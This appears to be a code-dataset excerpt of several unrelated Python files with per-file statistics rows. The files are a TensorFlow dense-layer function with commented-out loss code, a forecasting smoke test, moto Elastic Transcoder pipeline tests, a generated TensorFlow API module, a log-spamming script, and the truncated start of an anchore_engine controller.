        so any call raised NameError. It is now a parameter (default
        False, backward compatible).
      * ``tf.variable_scope('fc8', reuse)`` passed ``reuse`` positionally
        as ``default_name`` instead of as the ``reuse`` keyword argument;
        now passed as ``reuse=reuse``.

    Args:
        pool5: 4-D feature tensor with static shape known past axis 0.
        reuse: whether to reuse variables in the dense-layer scopes.

    Returns:
        The fc8 activation tensor, shape ``[batch, 1000]``.
    """
    # NOTE(review): original comment warned "ReLU is killing your signal" —
    # a ReLU on the final layer zeroes negative logits; confirm intended.
    with tf.variable_scope('fc6', reuse=reuse):  # 13
        flat_dim = int(np.prod(pool5.get_shape()[1:]))
        in_ = tf.reshape(pool5, [-1, flat_dim])
        print('pool5_flat', in_.get_shape())
        fc6 = tf.nn.relu(tf.layers.dense(in_, 4096))
        print('fc6', fc6.get_shape())
    with tf.variable_scope('fc7', reuse=reuse):  # 13
        fc7 = tf.nn.relu(tf.layers.dense(fc6, 1000))
        print('fc7', fc7.get_shape())
    with tf.variable_scope('fc8', reuse=reuse):  # 13
        fc8 = tf.nn.relu(tf.layers.dense(fc7, 1000))
        print('fc8', fc8.get_shape())
    return fc8
#def loss(feat1, feat2, labels):
# """Add Loss to all the trainable variables.
#
# Add summary for for "Loss" and "Loss/avg".
# Args:
# logits: Logits from inference().
# labels: Labels from distorted_inputs or inputs(). 2-D tensor
# of shape [batch_size, 1]
#
# Returns:
# Loss tensor of type float.
# """
# margin = 0
# #d_op = tf.reduce_sum(tf.square(feat1 - feat2), (1,2,3))
# #d_op = tf.reduce_sum(tf.square(feat1 - feat2), (1))
# #d = tf.nn.l2_loss(feat1 - feat2)# / (header.BATCH_SIZE ) #* header.IMAGE_SIZE)
# d_op = tf.reduce_sum(tf.abs(feat1 - feat2), (1,2,3)) # paper recommends L1 to avoid local minima
#
# print('d.shape: ', d_op.get_shape())
# print('labels.shape: ', labels.get_shape())
# #d_sqrt = tf.sqrt(d)
# #loss = labels * tf.square(tf.maximum(0., margin - d_sqrt)) + (1 - labels) * d
# #loss = (1-labels) * tf.maximum(0., margin - d) + labels * d
# loss_b = labels * d_op + (1 - labels) * (margin - d_op)
# print('loss_b.shape: ', loss_b.get_shape())
# #loss = tf.reduce_sum(loss_b)
# loss = tf.reduce_mean(loss_b)
# tf.summary.scalar('loss', loss)
#
# tf.add_to_collection('losses', loss)
# # The total loss is defined as the l2 loss plus all of the weight
# # decay terms (L2 loss).
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), loss_b#, d_op
# #return tf.add_n(tf.get_collection('losses'), name='total_loss')
#
#def triplet_loss(feat1, feat2, feat3, args):
# """
# Triplet loss
# """
# margin = args.margin
# #d = tf.nn.l2_loss(feat1 - feat2)# / (header.BATCH_SIZE ) #* header.IMAGE_SIZE)
# dp = tf.reduce_sum(tf.abs(feat1 - feat2), (1,2,3)) # P example
# dn = tf.reduce_sum(tf.abs(feat1 - feat3), (1,2,3)) # N example
# dp_mean = tf.reduce_mean(dp)
# dn_mean = tf.reduce_mean(dn)
# tf.summary.scalar('dn', dn_mean)
# tf.summary.scalar('dp', dp_mean)
# loss_b = tf.maximum(0.0, margin + dp - dn)
# loss = tf.reduce_mean(loss_b)
# #print('dn.shape: ', dn.get_shape())
# #print('loss_b.shape: ', loss_b.get_shape())
# tf.summary.scalar('loss', loss)
#
# tf.add_to_collection('losses', loss)
# # The total loss is defined as the l2 loss plus all of the weight
# # decay terms (L2 loss).
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), dp, dn
# #return tf.add_n(tf.get_collection('losses'), name='total_loss')
#def loss_classif(logits, labels):
# """Add Loss to all the trainable variables.
#
# Add summary for for "Loss" and "Loss/avg".
# Args:
# logits: Logits from inference().
# labels: Labels from distorted_inputs or inputs(). 2-D tensor
# of shape [batch_size, 1]
#
# Returns:
# Loss tensor of type float.
# """
# labels = tf.cast(labels, tf.int64)
# loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels))
# correct_prediction = tf.equal(tf.argmax(logits, 1), labels)
# acc = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
#
# tf.summary.scalar('loss', loss)
# tf.summary.scalar('acc', acc)
# tf.add_to_collection('losses', loss)
# return tf.add_n(tf.get_collection('losses'), name='total_loss'), acc
#
#def _add_loss_summaries(total_loss):
# """Add summaries for losses in CIFAR-10 model.
#
# Generates moving average for all losses and associated summaries for
# visualizing the performance of the network.
#
# Args:
# total_loss: Total loss from loss().
# Returns:
# loss_averages_op: op for generating moving averages of losses.
# """
# # Compute the moving average of all individual losses and the total loss.
# loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
# losses = tf.get_collection('losses')
# loss_averages_op = loss_averages.apply(losses + [total_loss])
#
# # Attach a scalar summary to all individual losses and the total loss; do the
# # same for the averaged version of the losses.
# for l in losses + [total_loss]:
# # Name each loss as '(raw)' and name the moving average version of the loss
# # as the original loss name.
# tf.summary.scalar(l.op.name +' (raw)', l)
# tf.summary.scalar(l.op.name, loss_averages.average(l))
#
# return loss_averages_op
#
#
#def train(total_loss, global_step, args):
# """Train CIFAR-10 model.
# Create an optimizer and apply to all trainable variables. Add moving
# average for all trainable variables.
# Args:
# total_loss: Total loss from loss().
# global_step: Integer Variable counting the number of training steps
# processed.
# Returns:
# train_op: op for training.
# """
# # Generate moving averages of all losses and associated summaries.
# loss_averages_op = _add_loss_summaries(total_loss)
#
# #var_to_train = tf.trainable_variables()
# #print('\nvar to train')
# #for var in var_to_train:
# # print(var.op.name)
#
# # Compute gradients.
# with tf.control_dependencies([loss_averages_op]):
# opt = tf.train.AdamOptimizer(args.lr, args.adam_b1, args.adam_b2, args.adam_eps)
#
# # TODO BN
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) #line for BN
# with tf.control_dependencies(update_ops):
# grads = opt.compute_gradients(total_loss, var_list=tf.trainable_variables())
# apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
#
# # no BN
# # grads = opt.compute_gradients(total_loss, var_list=tf.trainable_variables())
# #apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
#
# # Add histograms for trainable variables.
# for var in tf.trainable_variables():
# tf.summary.histogram(var.op.name, var)
#
# # Add histograms for gradients.
# for grad, var in grads:
# if grad is not None:
# tf.summary.histogram(var.op.name + '/gradients', grad)
#
# # Track the moving averages of all trainable variables.
# variable_averages = tf.train.ExponentialMovingAverage(args.moving_average_decay, global_step)
#
# with tf.control_dependencies([apply_gradient_op]):
# variables_averages_op = variable_averages.apply(tf.trainable_variables())
# #train_op = tf.no_op(name='train')
#
# return variables_averages_op #train_op
| 50.799695
| 143
| 0.640483
| 14,797
| 99,923
| 4.110901
| 0.025073
| 0.083003
| 0.046853
| 0.009469
| 0.925315
| 0.920712
| 0.910898
| 0.9047
| 0.893883
| 0.888129
| 0
| 0.071498
| 0.201455
| 99,923
| 1,966
| 144
| 50.825534
| 0.690838
| 0.373968
| 0
| 0.833
| 0
| 0
| 0.059548
| 0.00116
| 0
| 0
| 0
| 0.000509
| 0
| 1
| 0.01
| false
| 0
| 0.015
| 0
| 0.035
| 0.103
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a841d3faee167848d174ee806e9b2223d4869b
| 156
|
py
|
Python
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
shaido987/pyaf
|
b9afd089557bed6b90b246d3712c481ae26a1957
|
[
"BSD-3-Clause"
] | 377
|
2016-10-13T20:52:44.000Z
|
2022-03-29T18:04:14.000Z
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 160
|
2016-10-13T16:11:53.000Z
|
2022-03-28T04:21:34.000Z
|
tests/croston/croston_test_1_legacy_linear_trend.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 63
|
2017-03-09T14:51:18.000Z
|
2022-03-27T20:52:57.000Z
|
# Smoke test: build a legacy Croston model with a linear trend over one year
# of daily data (N=365). croston_type=None selects the default variant.
# from .croston import croston_tests as crost
import tests.croston.croston_tests as crost
crost.create_model(N = 365 , croston_type = None, iTrend = True)
| 31.2
| 64
| 0.782051
| 24
| 156
| 4.916667
| 0.583333
| 0.20339
| 0.237288
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022388
| 0.141026
| 156
| 4
| 65
| 39
| 0.858209
| 0.275641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b702763e3b7667148cb5f2e2bf0aba32402878e9
| 157
|
py
|
Python
|
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | null | null | null |
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | null | null | null |
tests/test_files_exist.py
|
maxachis/food-access-map-data
|
40fbb7bbb2434f0a177237dd2fee1e9f36138a12
|
[
"MIT"
] | 1
|
2021-01-24T16:18:49.000Z
|
2021-01-24T16:18:49.000Z
|
#test_files_exist.py
import os.path
from os import path
def test_merge_duplicates_exists():
assert path.isfile("data_prep_scripts/auto_merge_duplicates.R")
| 26.166667
| 64
| 0.840764
| 26
| 157
| 4.730769
| 0.730769
| 0.243902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076433
| 157
| 6
| 64
| 26.166667
| 0.848276
| 0.121019
| 0
| 0
| 0
| 0
| 0.297101
| 0.297101
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b71a6d0a3a3a4a238c2b2d25c9c762ce19b4653e
| 1,332
|
py
|
Python
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 3
|
2020-10-12T15:47:01.000Z
|
2022-01-14T19:51:26.000Z
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | null | null | null |
python3/lib/python3.6/site-packages/tensorflow/_api/v1/spectral/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 2
|
2020-08-03T13:02:06.000Z
|
2020-11-04T03:15:44.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.spectral namespace.
"""
from __future__ import print_function as _print_function
from tensorflow.python.ops.gen_spectral_ops import fft
from tensorflow.python.ops.gen_spectral_ops import fft2d
from tensorflow.python.ops.gen_spectral_ops import fft3d
from tensorflow.python.ops.gen_spectral_ops import ifft
from tensorflow.python.ops.gen_spectral_ops import ifft2d
from tensorflow.python.ops.gen_spectral_ops import ifft3d
from tensorflow.python.ops.signal.dct_ops import dct
from tensorflow.python.ops.signal.dct_ops import idct
from tensorflow.python.ops.signal.fft_ops import irfft
from tensorflow.python.ops.signal.fft_ops import irfft2d
from tensorflow.python.ops.signal.fft_ops import irfft3d
from tensorflow.python.ops.signal.fft_ops import rfft
from tensorflow.python.ops.signal.fft_ops import rfft2d
from tensorflow.python.ops.signal.fft_ops import rfft3d
del _print_function
import sys as _sys
from tensorflow.python.util import deprecation_wrapper as _deprecation_wrapper
if not isinstance(_sys.modules[__name__], _deprecation_wrapper.DeprecationWrapper):
_sys.modules[__name__] = _deprecation_wrapper.DeprecationWrapper(
_sys.modules[__name__], "spectral")
| 42.967742
| 83
| 0.843093
| 196
| 1,332
| 5.454082
| 0.280612
| 0.239476
| 0.280636
| 0.301216
| 0.654818
| 0.654818
| 0.654818
| 0.654818
| 0.106642
| 0
| 0
| 0.006579
| 0.087087
| 1,332
| 30
| 84
| 44.4
| 0.872533
| 0.123123
| 0
| 0
| 1
| 0
| 0.006897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.809524
| 0
| 0.809524
| 0.095238
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fb036a6f63afd6163209a65c5ec2bdc774c1a91
| 15,016
|
py
|
Python
|
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | null | null | null |
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | 1
|
2021-09-13T04:39:03.000Z
|
2021-09-13T04:39:03.000Z
|
tests/test_elastictranscoder/test_elastictranscoder.py
|
oakbramble/moto
|
6350d8ec4c59eaf12b83385b6acd386e5c2f5593
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from botocore.exceptions import ClientError
import boto3
import sure # noqa
import pytest
from moto import mock_elastictranscoder
from moto.core import ACCOUNT_ID
@mock_elastictranscoder
def test_create_simple_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
response = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(201)
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
response.should.have.key("Warnings").being.equal([])
@mock_elastictranscoder
def test_create_pipeline_with_content_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
response = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
ContentConfig={"Bucket": "outputtest"},
ThumbnailConfig={"Bucket": "outputtest"},
Role=role,
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(201)
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_create_pipeline_with_outputbucket_and_content_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
ContentConfig={"Bucket": "configoutputtest"},
Role=role,
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[OutputBucket and ContentConfig are mutually exclusive.]"
)
@mock_elastictranscoder
def test_create_pipeline_without_thumbnail_config():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
ContentConfig={"Bucket": "outputtest"},
Role=role,
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[ThumbnailConfig:Bucket is not allowed to be null if ContentConfig is specified.]"
)
@mock_elastictranscoder
def test_create_pipeline_without_role():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(Name="testpipeline", InputBucket="inputtest", Role="")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal("Role cannot be blank")
@mock_elastictranscoder
def test_create_pipeline_with_invalid_role():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline", InputBucket="inputtest", Role="asdf"
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal("Role ARN is invalid: asdf")
@mock_elastictranscoder
def test_create_pipeline_without_output():
client = boto3.client("elastictranscoder", region_name="us-east-1")
with pytest.raises(ClientError) as ex:
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
Role=create_role_name("nonexistingrole"),
)
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"[OutputBucket and ContentConfig:Bucket are not allowed to both be null.]"
)
@mock_elastictranscoder
def test_list_pipelines():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)
response = client.list_pipelines()
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipelines").being.length_of(1)
pipeline = response["Pipelines"][0]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_read_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.read_pipeline(Id=pipeline["Id"])
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_read_unknown_pipeline_format():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id="unknown-pipeline")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"1 validation error detected: Value 'unknown-pipeline' at 'id' failed to satisfy constraint: Member must satisfy regular expression pattern: ^\\d{13}-\\w{6}$"
)
@mock_elastictranscoder
def test_read_nonexisting_pipeline_format():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
pipeline_id = "0000000000000-abcdef"
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id=pipeline_id)
err = ex.value.response["Error"]
err["Code"].should.equal("ResourceNotFoundException")
err["Message"].should.equal(
"The specified pipeline was not found: account={}, pipelineId={}.".format(
ACCOUNT_ID, pipeline_id
)
)
@mock_elastictranscoder
def test_update_pipeline_name():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.update_pipeline(Id=pipeline["Id"], Name="newtestpipeline")
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("newtestpipeline")
pipeline.should.have.key("Arn").being.equal(
"arn:aws:elastictranscoder:{}:{}:pipeline/{}".format(
region, ACCOUNT_ID, pipeline["Id"]
)
)
pipeline.should.have.key("Status").being.equal("Active")
pipeline.should.have.key("InputBucket").being.equal("inputtest")
pipeline.should.have.key("OutputBucket").being.equal("outputtest")
pipeline.should.have.key("Role").being.equal(role)
pipeline.should.have.key("Notifications").being.equal(
{"Progressing": "", "Completed": "", "Warning": "", "Error": ""}
)
pipeline.should.have.key("ContentConfig")
pipeline["ContentConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ContentConfig"].should.have.key("Permissions").being.equal([])
pipeline.should.have.key("ThumbnailConfig")
pipeline["ThumbnailConfig"].should.have.key("Bucket").being.equal("outputtest")
pipeline["ThumbnailConfig"].should.have.key("Permissions").being.equal([])
@mock_elastictranscoder
def test_update_pipeline_input_and_role():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
newrole = create_role_name("newrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
response = client.update_pipeline(
Id=pipeline["Id"], InputBucket="inputtest2", Role=newrole
)
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipeline")
pipeline = response["Pipeline"]
pipeline.should.have.key("Id")
pipeline.should.have.key("Name").being.equal("testpipeline")
pipeline.should.have.key("InputBucket").being.equal("inputtest2")
pipeline.should.have.key("Role").being.equal(newrole)
@mock_elastictranscoder
def test_update_pipeline_with_invalid_id():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
with pytest.raises(ClientError) as ex:
client.update_pipeline(Id="unknown-pipeline")
err = ex.value.response["Error"]
err["Code"].should.equal("ValidationException")
err["Message"].should.equal(
"1 validation error detected: Value 'unknown-pipeline' at 'id' failed to satisfy constraint: Member must satisfy regular expression pattern: ^\\d{13}-\\w{6}$"
)
@mock_elastictranscoder
def test_update_nonexisting_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
pipeline_id = "0000000000000-abcdef"
with pytest.raises(ClientError) as ex:
client.read_pipeline(Id=pipeline_id)
err = ex.value.response["Error"]
err["Code"].should.equal("ResourceNotFoundException")
err["Message"].should.equal(
"The specified pipeline was not found: account={}, pipelineId={}.".format(
ACCOUNT_ID, pipeline_id
)
)
@mock_elastictranscoder
def test_delete_pipeline():
region = "us-east-1"
client = boto3.client("elastictranscoder", region_name=region)
role = create_role_name("nonexistingrole")
pipeline = client.create_pipeline(
Name="testpipeline",
InputBucket="inputtest",
OutputBucket="outputtest",
Role=role,
)["Pipeline"]
client.delete_pipeline(Id=pipeline["Id"])
response = client.list_pipelines()
response["ResponseMetadata"]["HTTPStatusCode"].should.equal(200)
response.should.have.key("Pipelines").being.length_of(0)
def create_role_name(name):
return "arn:aws:iam::{}:role/{}".format(ACCOUNT_ID, name)
| 37.446384
| 166
| 0.685802
| 1,613
| 15,016
| 6.282703
| 0.081215
| 0.078942
| 0.102625
| 0.111901
| 0.924314
| 0.91494
| 0.905664
| 0.881093
| 0.881093
| 0.87162
| 0
| 0.007351
| 0.157499
| 15,016
| 400
| 167
| 37.54
| 0.793692
| 0.000266
| 0
| 0.755952
| 0
| 0.005952
| 0.269154
| 0.02072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050595
| false
| 0
| 0.020833
| 0.002976
| 0.074405
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3fbaf2bdfdaab2f7c2ecc78999b877d18a05bfa2
| 941
|
py
|
Python
|
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
logger.py
|
mike-nguyen/openshift-log-test
|
b7148012daa9dfbfe1bef9b0478a791cc80202b8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
for i in range(9223372036854775807):
print "%d long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message long log message " % i
| 188.2
| 884
| 0.81084
| 164
| 941
| 4.652439
| 0.079268
| 0.46789
| 0.93578
| 1.179554
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0.93578
| 0
| 0.024516
| 0.176408
| 941
| 4
| 885
| 235.25
| 0.96
| 0.017003
| 0
| 0
| 0
| 0.5
| 0.941558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 15
|
b7b2cbc7252e59c1bfaa9252b561fd2b26d4d739
| 24,074
|
py
|
Python
|
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/catalog/api/controllers/default_controller.py
|
jasonwilk/anchore-engine
|
3b587a597be985cf5895f4a249418855d4be3fae
|
[
"Apache-2.0"
] | null | null | null |
import connexion
import time
from anchore_engine import db
import anchore_engine.services.catalog.catalog_impl
import anchore_engine.services.common
from anchore_engine.subsys import logger
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
from anchore_engine.subsys.metrics import flask_metrics, flask_metric_name, enabled as flask_metrics_enabled
def status():
httpcode = 500
try:
